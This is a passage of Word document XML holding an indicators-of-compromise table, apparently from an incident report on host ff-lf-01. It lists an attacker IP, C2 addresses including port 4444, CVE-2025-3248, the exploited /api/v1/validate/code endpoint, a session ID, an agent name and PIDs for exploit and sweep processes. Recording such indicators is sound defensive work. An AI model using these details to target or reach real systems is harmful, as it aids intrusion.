    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02EB378F" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="8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2000"/>
        <w:gridCol w:w="2260"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="594F2061" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="3AB3EEAD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="6D3D45CB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4D7EDF55" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="525F0B51" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">First Seen (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="27AB56B9" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B943056" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38D98F30" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">64.20.53.230</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7092F587" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="077CEC0E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="0797F31B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5DCA9A0B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C2 IP:Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64EEEF54" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">45.131.66.106:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42798288" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69EDF494" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:22:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6DD55DA7" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E3653A4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C2 IP:Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30A20452" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">104.16.132.229:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78BD0E33" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2250AFE3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="1F252689" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40253697" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="481AA512" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2025-3248</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="287A4559" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32B773D7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="4F5A1C2C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="687BC520" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BF19760" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/api/v1/validate/code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CC8EF92" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="681F0761" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6E49993F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BDAF87F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Session ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AB3D28E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">jp-7f3c9a21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B17EEE1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FDD39C0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="77A2060E" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51563A72" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D96005A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>jadepuffer-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4104E9D0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C77E920" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20–19:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5FF46010" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B5BE4EE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PID (exploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E666763" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">4471</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1599F21D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="756F1610" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="022423AC" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AFF3AD7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PID (sweep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10C7146C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">4491</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F751F65" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="358AD0DB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6F649771" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3ABFE306" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
